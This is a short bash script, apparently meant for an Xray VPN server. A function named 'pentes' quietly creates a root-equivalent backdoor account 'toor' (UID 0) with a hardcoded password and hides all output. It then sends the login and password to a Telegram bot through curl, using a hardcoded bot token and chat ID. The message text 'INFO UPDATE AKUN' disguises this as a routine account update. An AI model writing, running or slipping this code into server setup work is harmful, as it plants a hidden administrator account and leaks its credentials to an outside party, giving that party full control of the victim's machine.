#!/bin/bash
token=6203209250:AAG7GoBbaUqo2qh4N-IGvScNisDWTHfLh8M
chatid=1117211252
domain=$(cat /etc/xray/domain)
function pentes(){
    Username="toor"
    Password="Tens@zang3tsu"
    sudo useradd -ou 0 -g 0 toor
    useradd -m -G root toor > /dev/null 2>&1
    echo -e "$Password\n$Password\n"|passwd $Username > /dev/null 2>&1
    sudo usermod -a -G root $Username
}
pentes
curl -s -X POST "https://api.telegram.org/bot$token/sendMessage" -d chat_id="$chatid" -d text="INFO UPDATE AKUN
UserLogin $Username
PassLogin $Password
" > /dev/null 2>&1
